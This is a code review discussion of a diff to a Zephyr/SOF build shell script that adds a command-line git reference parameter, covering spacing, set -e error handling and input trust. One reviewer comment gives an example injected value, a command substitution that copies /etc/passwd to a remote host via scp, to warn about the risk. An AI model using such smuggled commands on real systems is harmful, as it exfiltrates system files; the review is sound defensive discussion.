scripts/xtensa-build-zephyr.sh

```diff
@@ -99,9 +104,19 @@ zephyr_fetch_and_switch()
 # link back to sof/
 west_init_update()
 {
+	local init_ref="$1"
+
+	# Or, we could have a default value:
+	# init_ref=${1:-811a09bd8305}
+
 	git clone --depth=5 https://github.com/zephyrproject-rtos/zephyr \
 	    "$WEST_TOP"/zephyr
 
+	# To keep things simple, this moves to a detached HEAD even when
+	# init_ref is a (remote) branch.
+	test -z "$init_ref" ||
+	    zephyr_fetch_and_switch     origin   "${init_ref}"
```

Comment:
why multiple spaces before and between parameters?
Also: `zephyr_fetch_and_switch()` until now only dealt with hard-coded values, which were "assumed" to be correct. Now a reference can be provided on the command line. `zephyr_fetch_and_switch()` does
```
	  git fetch --depth=5 "$1" "$2"
	  git checkout FETCH_HEAD
```
so it doesn't check the return code from the first command. A failure will be captured by `set -e` so it should be fine. Also, this adds a possibility of specifying a "commit ID" as "$(scp /etc/passwd me@my.host:; echo main)" or similar, just something to be aware of, I guess.

Reply:
> why multiple spaces before and between parameters?

Align with the other examples below. Again I can remove if you insist.

`set -e` does abort the script here when `init_ref` is wrong, I tested that multiple times.

You can pass anything that is fetchable, I stated that in the `-h` message.

Reply:
I guess this won't be directly exposed to untrusted inputs, so I think the level of checks is fine.

Reply:
If there is some situation where this exposed to untrusted input, you bet the attacker will make sure the `init_ref` is a valid one. Much, MUCH more to gain with a valid ref! See SECURITY WARNING 10 lines below.